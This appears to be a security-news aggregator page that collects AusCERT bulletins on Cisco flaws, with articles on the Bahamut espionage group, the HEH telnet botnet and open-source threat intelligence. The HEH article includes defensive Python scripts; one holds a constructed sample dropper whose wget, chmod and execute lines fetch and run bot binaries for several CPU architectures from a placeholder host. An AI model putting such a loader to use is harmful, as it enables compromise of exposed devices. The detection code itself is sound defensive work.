Malware Devil

Thursday, October 8, 2020

ESB-2020.3476 – [Cisco] Cisco Vision Dynamic Signage Director: Multiple vulnerabilities


===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3476
Cisco Vision Dynamic Signage Director Missing Authentication Vulnerability
                              8 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Vision Dynamic Signage Director
Publisher:         Cisco Systems
Operating System:  Cisco
Impact/Access:     Modify Arbitrary Files   -- Remote/Unauthenticated
                   Access Confidential Data -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-3598  

Original Bulletin: 
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cvdsd-missing-auth-rQO88rnj

--------------------------BEGIN INCLUDED TEXT--------------------

Cisco Vision Dynamic Signage Director Missing Authentication Vulnerability

Priority:        Medium

Advisory ID:     cisco-sa-cvdsd-missing-auth-rQO88rnj

First Published: 2020 October 7 16:00 GMT

Version 1.0:     Final

Workarounds:     No workarounds available

Cisco Bug IDs:   CSCvv21344

CVE-2020-3598    

CWE-306

Summary

  o A vulnerability in the web-based management interface of Cisco Vision
    Dynamic Signage Director could allow an unauthenticated, remote attacker to
    access confidential information or make configuration changes.

    The vulnerability is due to missing authentication for a specific section
    of the web-based management interface. An attacker could exploit this
    vulnerability by accessing a crafted URL. A successful exploit could allow
    the attacker to obtain access to a section of the interface, which they
    could use to read confidential information or make configuration changes.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/
    cisco-sa-cvdsd-missing-auth-rQO88rnj

Affected Products

  o Vulnerable Products

    At the time of publication, this vulnerability affected Cisco Vision
    Dynamic Signage Director releases earlier than Release 6.2 SP6.

    See the Details section in the bug ID(s) at the top of this advisory for
    the most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance
    providers.

    Fixed Releases

    At the time of publication, Cisco Vision Dynamic Signage Director releases
    6.2 SP6 and later contained the fix for this vulnerability.

    See the Details section in the bug ID(s) at the top of this advisory for
    the most complete and current information.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o This vulnerability was found during internal security testing.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cvdsd-missing-auth-rQO88rnj

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  |        Description        | Section  | Status |     Date     |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2020-OCT-07  |
    +----------+---------------------------+----------+--------+--------------+

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================

The post ESB-2020.3476 – [Cisco] Cisco Vision Dynamic Signage Director: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2020/10/08/esb-2020-3476-cisco-cisco-vision-dynamic-signage-director-multiple-vulnerabilities/

ESB-2020.3477 – [Win] Cisco Webex Teams client for Windows: Execute arbitrary code/commands – Existing account


===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3477
     Cisco Webex Teams Client for Windows DLL Hijacking Vulnerability
                              8 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Webex Teams client for Windows
Publisher:         Cisco Systems
Operating System:  Windows
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-3535  

Original Bulletin: 
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-teams-dll-drsnH5AN

--------------------------BEGIN INCLUDED TEXT--------------------

Cisco Webex Teams Client for Windows DLL Hijacking Vulnerability

Priority:        High

Advisory ID:     cisco-sa-webex-teams-dll-drsnH5AN

First Published: 2020 October 7 16:00 GMT

Version 1.0:     Final

Workarounds:     No workarounds available

Cisco Bug IDs:   CSCvu86655

CVE-2020-3535    

CWE-427

Summary

  o A vulnerability in the loading mechanism of specific DLLs in the Cisco
    Webex Teams client for Windows could allow an authenticated, local attacker
    to load a malicious library. To exploit this vulnerability, the attacker
    needs valid credentials on the Windows system.

    The vulnerability is due to incorrect handling of directory paths at run
    time. An attacker could exploit this vulnerability by placing a malicious
    DLL file in a specific location on the targeted system. This file will
    execute when the vulnerable application launches. A successful exploit
    could allow the attacker to execute arbitrary code on the targeted system
    with the privileges of another user's account.

    Cisco has released software updates that address this vulnerability. There
    are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/
    cisco-sa-webex-teams-dll-drsnH5AN

Affected Products

  o Vulnerable Products

    This vulnerability affects Cisco Webex Teams for Windows releases
    3.0.13464.0 through 3.0.16040.0.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

    Cisco has confirmed that this vulnerability does not affect the following
    Cisco products:

       Webex Teams for Android
       Webex Teams for iPhone and iPad
       Webex Teams for Mac

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o Cisco has released free software updates that address the vulnerability
    described in this advisory. Customers may only install and expect support
    for software versions and feature sets for which they have purchased a
    license. By installing, downloading, accessing, or otherwise using such
    software upgrades, customers agree to follow the terms of the Cisco
    software license:
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html

    Additionally, customers may only download software for which they have a
    valid license, procured from Cisco directly, or through a Cisco authorized
    reseller or partner. In most cases this will be a maintenance upgrade to
    software that was previously purchased. Free security software updates do
    not entitle customers to a new software license, additional software
    feature sets, or major revision upgrades.

    When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories page, to determine exposure and a complete
    upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new release.
    If the information is not clear, customers are advised to contact the Cisco
    Technical Assistance Center (TAC) or their contracted maintenance
    providers.

    Customers Without Service Contracts

    Customers who purchase directly from Cisco but do not hold a Cisco service
    contract and customers who make purchases through third-party vendors but
    are unsuccessful in obtaining fixed software through their point of sale
    should obtain upgrades by contacting the Cisco TAC:
    https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html

    Customers should have the product serial number available and be prepared
    to provide the URL of this advisory as evidence of entitlement to a free
    upgrade.

    Fixed Releases

    Cisco fixed this vulnerability in Cisco Webex Teams for Windows releases
    3.0.16269.0 and later.

    For information about updating the client, see the Update the Cisco Webex
    Teams App to the Latest Release help article.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o Cisco would like to thank Hou JingYi of Qihoo 360 CERT for reporting this
    vulnerability.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving security
    vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-teams-dll-drsnH5AN

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  |        Description        | Section  | Status |     Date     |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2020-OCT-07  |
    +----------+---------------------------+----------+--------+--------------+

--------------------------END INCLUDED TEXT--------------------


https://malwaredevil.com/2020/10/08/esb-2020-3477-win-cisco-webex-teams-client-for-windows-execute-arbitrary-code-commands-existing-account/

Network Security News Summary for Thursday October 8 2020

A brief daily summary of what is important in cybersecurity. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minutes long, summary of current network security-related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Storm Center. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

https://malwaredevil.com/2020/10/07/network-security-news-summary-for-thursday-october-8-2020/

Wednesday, October 7, 2020

‘Bahamut’ Threat Group Targets Government & Industry in Middle East

Researchers say the cyber espionage group was involved in several attacks against government officials and businesses in the Middle East and South Asia.

A hack-for-hire cyberespionage group named Bahamut is involved in advanced attacks targeting government officials and organizations with sophisticated credential harvesting attacks and phishing campaigns, new Windows malware samples, zero-day exploits, and other techniques.

BlackBerry researchers who have been tracking Bahamut say the group is politically motivated and has a wide range of targets. The group has historically targeted people and entities in South Asia, particularly India and Pakistan, as well as the Middle East, primarily the UAE and Qatar. Its interests remain concentrated in South Asia and the Persian Gulf, researchers report.

In its latest writeup, the BlackBerry team builds on research published in 2018 that references a group called “The White Company,” explains vice president of research operations Eric Milam. Through this, they were able to connect more dots and add previous findings from other researchers who have tracked the group’s activity. Bahamut, named by researchers with open source intelligence site Bellingcat, has also been called “Ehdevel,” “Windshift,” and “Urpage.”

Despite its range of targets and attacks, a lack of discernible pattern or unifying motive leads researchers to believe Bahamut is likely acting as hack-for-hire operators. They believe the group has access to one zero-day developer and has leveraged zero-day exploits against multiple targets, “reflecting a skill-level well beyond most other known threat actor groups,” researchers state in their report.

“Bahamut executed highly disparate targeting across a number of verticals and geographic regions, [which] suggests a mercenary, hack-for-hire group acting in the interest of multiple sponsors,” says Milam. The varied nature of its activity indicates the group is likely for profit; some findings indicate it has dabbled in India’s private corporate intelligence market, he says.

While Bahamut’s activity in the Middle East has targeted private businesses and individuals, most of its attacks are aimed at government. In Saudi Arabia it went after seven different ministries and other agencies, with a focus on monetary and financial policy. It also targeted the Emirates, Qatar, Bahrain, and Kuwait, with an emphasis on foreign policy and defense.

BlackBerry did not list most of Bahamut’s targets by name, though it provided a general list that includes Middle East human rights activists, the Saudi Minister of Energy, Union of Arab Banks, journalists and foreign press in Egypt, Saudi Aramco, and Turkish government officials.

While attribution is difficult, BlackBerry believes Bahamut is located close to the regions it’s operating against and targeting people, businesses, government agencies, human rights groups, and political groups in South Asia and the Gulf, as well as in Europe, Africa, and China.

Inside Bahamut’s Advanced Attacks
The group tailored its attacks for each target depending on the victim’s preferred operating system and communication medium, Milam says. Its techniques depended on who they were trying to phish. Government officials, for example, were approached through their personal email before attackers tried to hack their work accounts.

“Their tradecraft is exceptional, meaning they truly have planned out each step and understand their capabilities and their targets,” Milam says.

Phishing and credential harvesting are aimed at precise targets and fueled by a robust reconnaissance operation. Researchers discovered phishing attempts designed to spoof government agency logins, private email accounts, and account portals from Microsoft Live, Gmail, Apple ID, Yahoo!, Twitter, Facebook, Telegram, OneDrive, and ProtonMail.

Its spear-phishing operations ranged from a few hours to multiple months, depending on the success rates. This rate of change makes real-time detection “all but impossible,” researchers state in their report. Bahamut learns from its mistakes: The group monitors for information published about them in the security community. When exposed, it changes its strategy quickly.

Attackers’ operational security makes them difficult to track, Milam continues. The group’s phishing and malware infrastructure is kept separate and changed weekly – sometimes daily. It’s known to reuse tools and infrastructure of other APT groups and builds anti-analysis features into its exploits and shellcode.

Bahamut often uses publicly available malware, which also impedes attribution efforts, but Milam notes it mostly uses malware as a last resort. Malware can signal an attacker is in the network; the longer malware is on a system, the higher its chances of being detected.

“The attackers were often able to achieve what they wanted [get information] via legitimate credentials for online services,” Milam says. “Once they had access to primary email accounts, they could generally watch and gain access to other systems or online portals of interest.”

Fake Apps and Fake News
Bahamut’s attacks in the Middle East take a broader approach with malicious mobile apps, which researchers say appear to be designed for general audiences. Fake apps targeting South Asia, however, were mostly politically themed and targeted groups such as Sikhs for Justice.

BlackBerry’s research uncovered nine malicious iOS applications and several Android apps that experts attribute to the group based on configuration and unique network service fingerprints. The apps came with websites, privacy policies, and terms of service – all things attackers typically overlook – that researchers say helped bypass Apple’s and Google’s security defenses.

Several of these Android apps were built by different developers. They included an app for recording phone calls, music players, a video player, and an app for notifying Muslims of prayer times during Ramadan. Bahamut used several of its own websites to distribute malicious apps.

Researchers found the apps they investigated were intended for targets in the UAE, as their downloads were restricted to the Emirates. Further, Ramadan-themed apps, as well as those invoking the Sikh separatist movement, indicate intent to target political and religious groups.

Bahamut uses carefully crafted websites to distribute fraudulent news. In one case, attackers took over a cybersecurity website and published articles about research, geopolitics, and news about other hacking groups. This website posted a list of contributors that were fake but used names and photos belonging to real reporters. Some of its fake websites tried to boost their legitimacy with connected social media accounts.

In many cases, targets who visited Bahamut’s websites found only original content: no malware, phishing, or malicious links. The operation was designed to tailor websites to their victims’ interests and, in doing so, make them appear as real as possible. Bahamut’s best interest, the researchers say, was to lure targets into its “vast fake empire.”

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial …

https://malwaredevil.com/2020/10/07/bahamut-threat-group-targets-government-industry-in-middle-east/

New ‘HEH’ Botnet Targets Exposed Telnet Services

Latest threat is one in a growing list of malware developed in the Go programming language.

A potentially destructive peer-to-peer (P2P) botnet has surfaced and is targeting a broad variety of Internet of Things (IoT) devices with exposed or weakly protected telnet services.

Researchers at China-based 360NetLab, who discovered the so-called HEH botnet this week, described the malware as capable of wiping all data from infected systems. According to the security vendor, the botnet poses a threat to any device with an exposed telnet service regardless of whether the device is based on x86, ARM, MIPS, PPC, or any other chip architecture.

The malware has been observed spreading via brute-force attacks against servers, routers, and other Internet-connected systems with telnet exposed on ports 23 and 2323. The bot, like a growing number of malware tools, is written in Go. It uses a proprietary P2P protocol to communicate with other infected devices and receive commands. The malware packs three separate components: a P2P module, a module for propagation, and a local HTTP service.
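As an added illustration, not 360NetLab’s code and not part of the original article, the following Python script flags sources that show the telnet brute-force pattern described above in a connection log. The log format, the thresholds, and the addresses are constructed for the example; any firewall or NetFlow export with a timestamp, source socket, and destination socket can be mapped onto the parse step.

```python
# Added example (not 360NetLab's or Dark Reading's code): flag sources that
# hammer telnet ports 23/2323 the way an IoT bot's brute-force spreader does.
# The log format is a constructed, firewall-style one.
import re
from collections import defaultdict, deque
from datetime import datetime

TELNET_PORTS = {23, 2323}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ACCEPT|DROP)\s+TCP\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)$"
)

# Constructed sample log (RFC 5737 documentation addresses, not real traffic):
#  - 203.0.113.5 makes six connections to one host's port 23 in five seconds
#  - 198.51.100.7 sweeps three hosts on 2323 (blocked, but still a sweep)
#  - 192.0.2.50 makes one SSH and one telnet connection (normal admin use)
#  - 192.0.2.60 touches port 23 five times but only every 30 s, so no 60 s
#    window ever holds more than three of them
SAMPLE_LOG = """\
2020-10-07T10:00:01Z ACCEPT TCP 203.0.113.5:51234 -> 192.0.2.10:23
2020-10-07T10:00:02Z ACCEPT TCP 203.0.113.5:51235 -> 192.0.2.10:23
2020-10-07T10:00:03Z ACCEPT TCP 203.0.113.5:51236 -> 192.0.2.10:23
2020-10-07T10:00:04Z ACCEPT TCP 203.0.113.5:51237 -> 192.0.2.10:23
2020-10-07T10:00:05Z ACCEPT TCP 203.0.113.5:51238 -> 192.0.2.10:23
2020-10-07T10:00:06Z ACCEPT TCP 203.0.113.5:51239 -> 192.0.2.10:23
2020-10-07T10:01:00Z DROP TCP 198.51.100.7:40001 -> 192.0.2.11:2323
2020-10-07T10:01:01Z DROP TCP 198.51.100.7:40002 -> 192.0.2.12:2323
2020-10-07T10:01:02Z DROP TCP 198.51.100.7:40003 -> 192.0.2.13:2323
2020-10-07T10:01:03Z DROP TCP 198.51.100.7:40004 -> 192.0.2.11:2323
2020-10-07T10:01:04Z DROP TCP 198.51.100.7:40005 -> 192.0.2.12:2323
2020-10-07T10:01:05Z DROP TCP 198.51.100.7:40006 -> 192.0.2.13:2323
2020-10-07T10:01:06Z DROP TCP 198.51.100.7:40007 -> 192.0.2.11:2323
2020-10-07T10:05:00Z ACCEPT TCP 192.0.2.50:55000 -> 192.0.2.10:22
2020-10-07T10:05:30Z ACCEPT TCP 192.0.2.50:55001 -> 192.0.2.10:23
2020-10-07T10:10:00Z ACCEPT TCP 192.0.2.60:56000 -> 192.0.2.20:23
2020-10-07T10:10:30Z ACCEPT TCP 192.0.2.60:56001 -> 192.0.2.20:23
2020-10-07T10:11:00Z ACCEPT TCP 192.0.2.60:56002 -> 192.0.2.20:23
2020-10-07T10:11:30Z ACCEPT TCP 192.0.2.60:56003 -> 192.0.2.20:23
2020-10-07T10:12:00Z ACCEPT TCP 192.0.2.60:56004 -> 192.0.2.20:23
garbage line that does not parse
"""


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": m["src"],
        "dst": m["dst"],
        "dport": int(m["dport"]),
    }


def find_telnet_sweeps(lines, threshold=5, window_seconds=60):
    """Map each offending source to (peak attempts inside one window,
    distinct targets). A source is flagged when at least `threshold`
    telnet connections fall inside any `window_seconds` span."""
    per_src = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["dport"] in TELNET_PORTS:
            per_src[rec["src"]].append((rec["ts"], rec["dst"]))

    flagged = {}
    for src, events in per_src.items():
        events.sort()
        window = deque()
        peak = 0
        for ts, dst in events:
            window.append((ts, dst))
            # Drop events that fell out of the trailing window.
            while (ts - window[0][0]).total_seconds() > window_seconds:
                window.popleft()
            peak = max(peak, len(window))
        if peak >= threshold:
            flagged[src] = (peak, len({d for _, d in events}))
    return flagged


if __name__ == "__main__":
    for src, (peak, targets) in find_telnet_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {peak} telnet connections in one window, {targets} target(s)")
```

The trailing window is what separates a sweep from ordinary use: the 192.0.2.60 entries show that five connections spread over two minutes are not flagged at the default threshold, while the same count inside a few seconds is. Blocked connections count too, since a DROP still records the attacker’s scanning. Tune threshold and window_seconds to the telnet traffic your network legitimately carries, which for most networks should be none.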

The bot samples 360NetLab analyzed were downloaded and executed via a malicious shell script. The script makes no attempt to enumerate the environment it lands on; it simply downloads and executes binaries for a variety of CPU architectures one after the other, 360NetLab said. The script and binaries the security vendor analyzed were hosted on a legitimate but likely compromised website.
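The download-then-run loop that paragraph describes is the same architecture-agnostic loader pattern Mirai-style droppers use. The following Python triage function, added here as an example and not taken from 360NetLab’s analysis, scores a shell script on that pattern. The sample script is constructed for the example and is not HEH’s real dropper; its host address and file names are made up.

```python
# Added example (not 360NetLab's analysis and not HEH's real dropper): static
# triage of a shell script to see whether it behaves like the multi-architecture
# "download, chmod, run, delete" loader common to IoT bots. SAMPLE_DROPPER is
# constructed here to show that pattern; the host and file names are made up.
import re

# Longer names first so "mipsel" is not reported as "mips", "x86_64" as "x86".
ARCH_TOKENS = (
    "x86_64", "x86", "i686", "i586", "aarch64", "arm7", "arm6", "arm5", "arm",
    "mips64", "mipsel", "mips", "powerpc", "ppc", "sh4", "m68k", "sparc",
)
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b[^\n;&|]*")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;'\"]+")
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./([\w.-]+)", re.MULTILINE)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+([\w./*-]+)")
CLEANUP_RE = re.compile(r"\brm\s+(?:-\w+\s+)*(?:\./)?[\w.*-]+")

SAMPLE_DROPPER = """\
#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://198.51.100.20/bins/bot.x86 -O x86; chmod +x x86; ./x86; rm -f x86
wget http://198.51.100.20/bins/bot.arm7 -O arm7; chmod +x arm7; ./arm7; rm -f arm7
wget http://198.51.100.20/bins/bot.mips -O mips; chmod +x mips; ./mips; rm -f mips
wget http://198.51.100.20/bins/bot.mipsel -O mipsel; chmod +x mipsel; ./mipsel; rm -f mipsel
wget http://198.51.100.20/bins/bot.ppc -O ppc; chmod +x ppc; ./ppc; rm -f ppc
"""

# A constructed benign installer, to show what does not trip the heuristic.
BENIGN_INSTALLER = """\
#!/bin/sh
curl -fsSL https://example.invalid/install.sh -o install.sh
chmod +x install.sh
./install.sh
"""


def arch_of(filename):
    """Return the CPU architecture named in a file name, or None."""
    low = filename.lower()
    for tok in ARCH_TOKENS:
        if tok in low:
            return tok
    return None


def triage_dropper(script):
    """Summarise download hosts, fetched architectures and run-after-chmod
    behaviour, and give a verdict on the multi-arch loader pattern."""
    urls = set()
    for m in FETCH_RE.finditer(script):
        urls.update(URL_RE.findall(m.group(0)))
    archs = {a for a in (arch_of(u.rsplit("/", 1)[-1]) for u in urls) if a}
    executed = set(EXEC_RE.findall(script))
    chmodded = set(CHMOD_RE.findall(script))
    hosts = {re.sub(r"^\w+://", "", u).split("/")[0] for u in urls}
    run_after_chmod = bool(executed & chmodded)
    # Three or more architectures fetched plus at least one "chmod then run"
    # is the signature of an architecture-agnostic loader: the script does not
    # care what CPU it is on, it just tries every binary in turn.
    verdict = "multi-arch dropper" if len(archs) >= 3 and run_after_chmod else "inconclusive"
    return {
        "verdict": verdict,
        "architectures": sorted(archs),
        "hosts": sorted(hosts),
        "executed": sorted(executed),
        "cleans_up": bool(CLEANUP_RE.search(script)),
    }


if __name__ == "__main__":
    for name, text in (("dropper", SAMPLE_DROPPER), ("installer", BENIGN_INSTALLER)):
        print(name, triage_dropper(text))
```

The hosts list is the part worth acting on: a compromised legitimate site serving the binaries, as in the HEH case, is an indicator to share and block even before the payloads themselves are analysed. The cleans_up flag records the self-deleting behaviour that leaves little on disk for later forensics, which is one reason to capture the script at the network edge rather than on the device.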

Once started, the malware kills off multiple services on the infected device depending on the port (23 or 2323) that was used to gain access. Then it starts an HTTP server that initially pulls up a copy of the “Universal Declaration of Human Rights” in Chinese and seven other languages. This initial content is quickly overwritten with data pulled from another infected peer on the botnet, 360NetLab said.

According to the vendor, a self-destruct function in the malware is especially noteworthy. “When the Bot receives a [command] with code number 8, the Bot will try to wipe out everything on all the disks” through a series of shell commands, the vendor said.

360NetLab’s report did not offer insight into whether the HEH botnet would be used to launch distributed denial-of-service (DDoS) attacks, distribute spam and malware, or for other purposes. For the moment, at least, the botnet’s attack function has not been implemented, which suggests the HEH botnet is still in development, the security vendor said.

An Ongoing Trend
The HEH bot is part of a growing number of telnet- and SSH-targeting malware tools written in the Go programming language that have been observed lately. They represent a shift from older IoT malware like Mirai that was developed in C or in other languages like Perl and C++. This year alone, multiple vendors and researchers have reported IoT bots written in Go, including Kaiji, IRCflu, and more recently FritzFrog, a peer-to-peer botnet that has been actively compromising SSH servers since the beginning of this year.

Craig Young, computer security researcher at Tripwire’s vulnerability and exposure research team, says the growing popularity of Go among threat actors is interesting. The HEH botnet is one in a series of Go-based botnets that appear to be coming out of a small group of malware developers. It suggests either a new generation of malware authors or a new wave of capabilities.

“Go is a very powerful programming language with a wide library of community supported modules,” Young says.

Go enables developers to manipulate very low-level behaviors, he notes.

“Malware authors may leverage this to thwart analysis attempts by using custom variations of compression or encryption algorithms,” he says.

While malware developed in Go does not necessarily complicate defenses for organizations, it does require them to update their toolkits in some circumstances, Young noted.

The HEH botnet poses little risk to organizations in its current form. For the moment, the malware has only been observed targeting exposed telnet services, which no responsible organization should have, he says.

“For most organizations, the threat of this botnet at this time is minimal, but it could certainly evolve,” Young says. “An update to the malware can be pushed out at any moment to introduce new attack and propagation techniques.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

https://malwaredevil.com/2020/10/07/new-heh-botnet-targets-exposed-telnet-services/

Open Source Threat Intelligence Searches for Sustainable Communities

As long as a community is strong, so will be the intelligence it shares on open source feeds. But if that community breaks down …

When the Computer Incident Response Center in Luxembourg (CIRCL) analyzes incidents for threat information, the group deals mostly with proprietary, sensitive, and, in some cases, classified information from companies and the communities with whom the incident response team regularly works.

Yet the group also relies heavily on open source intelligence as a way to eliminate the noise of known threats and reduce the workload for the group’s operators, says Andras Iklody, a CIRCL operator and a core developer for the MISP threat-intelligence sharing platform. Open source threat intelligence lets the group bootstrap its analyses and helps reduce its workload quickly to instead focus on novel threats, he says.

“It makes our lives easier by getting the low-hanging fruit out of the way,” Iklody says. “Even though we are not using it directly for detection purposes — which we could, depending on the source — it is already a huge help in, for example, figuring out quickly what we are dealing with. Is it something that is already known? Or is it something that we should spend more time with?”

Open source intelligence feeds are getting better in many ways. For example, the information is typically more focused and better vetted than in the past. But there are potential pitfalls, say experts. Because filtering bad data out of a threat feed is time-consuming and difficult, open source threat intelligence often lags behind the intelligence provided by other sources. On the other hand, some automated or crowdsourced systems — such as AbuseIPDB, a database of Internet-address reputations — can find early indicators of maliciousness.

Both the good and the bad stem from the relationship between open source threat intelligence and the volunteers who give their time to build the tools and analyze potential threats, says Karl Sigler, senior security research manager at Trustwave. Large volunteer efforts can produce powerful sources of threat data, but such communities can also disappear when interest wanes.

“As long as the community remains strong, then the open source feeds will remain,” he says. “But the communities tend to break down, so you can’t always rely on the feeds being there.”

Open source and commercial feeds also typically do not cover the same ground, which makes choosing between them difficult. In research published in August, researchers from universities in the Netherlands and Germany compared threat indicators from four open source threat intelligence feeds and two commercial feeds and found very little overlap between the sources. A comparison of indicators for 22 threat groups found the feeds had, at most, 4% of their indicators in common.

Getting Started
For most companies, the most valuable threat intelligence is data from their own network flows and security logs. Companies getting started in threat intelligence should focus on joining a sector- or industry-specific threat information exchange group, MISP’s Iklody advises. Such groups will not only alert member companies to potential threats, but they will also have industry-specific best practices that can help shore up an organization’s defenses.

“Get together with similar organizations that you can exchange information with,” he says. “If you are working in a specific sector and you can join an ISAC, do that and get the information they can share with you.”

Any company using threat intelligence should make sure it is consuming the data from the feeds appropriately and with a skeptical eye. The technical indicators of a specific threat targeting one organization may be significantly different from the indicators of the same threat attacking another organization, says Andrew Morris, founder of threat-data enrichment startup GreyNoise Intelligence.

“To figure out where the badness is that’s the most relevant to you, you go through some process on your network,” he says.

Companies can combine data from their own networks and environments, and query that data, to glean information about the specific threats that impact their users.

“One of the issues is [because] there are so many threat feeds that are so large and have so little context and change so rapidly, it is very costly to try to implement all the different intel feeds and weed out false positives and derive value,” Morris says.

The public nature of open source threat intelligence feeds can also be a weakness. Not only do companies have to consider how much detail to release openly, but often such public disclosure will be a warning to attackers to change their behavior, thus becoming harder to detect, says Maurits Lucas, director of intelligence for Intel471, a commercial threat intelligence provider.

“Some of the bits you cannot publish in open source because open source is available to the very people you are observing,” he says. “So whatever you are publishing will be the first and last [indicator] that you will publish on that particular source.”

Reality Check
Can weaknesses in open source intelligence be fixed? The economics of information sharing and the value added by companies in vetting their commercial threat-intelligence feeds make it unlikely.

MISP’s Iklody points to the impact of forced sharing as an example. When an information-sharing organization in the Asia-Pacific region required members to share a certain amount of data every month to retain their membership, many smaller companies did not have regular incident information to contribute. Instead, they reclassified minor concerns as threats and ended up flooding the group’s feeds with noise, he says.

Those types of approaches, meant to solve the contribution problems of open source, underscore the asymmetry between the larger companies with mature security programs and smaller industry players that primarily end up lurking on such information feeds.

“Whenever you have a requirement that people share information, it backfires,” Iklody says. “There are some exceptions to that, but in many cases organizations cannot produce data fast enough, or they start flooding the community with junk.”

Still, for companies just starting out in threat intelligence, open source can be a way to work with standardized forms of reporting and analysis that are widely taught, Trustwave’s Sigler says.

“I always recommend starting out with open source, not just with intel feeds but with all security,” he says. “It lets you dip your toe in the water without a commitment. I see so many times that people commit to a product that just sits on their shelf.”

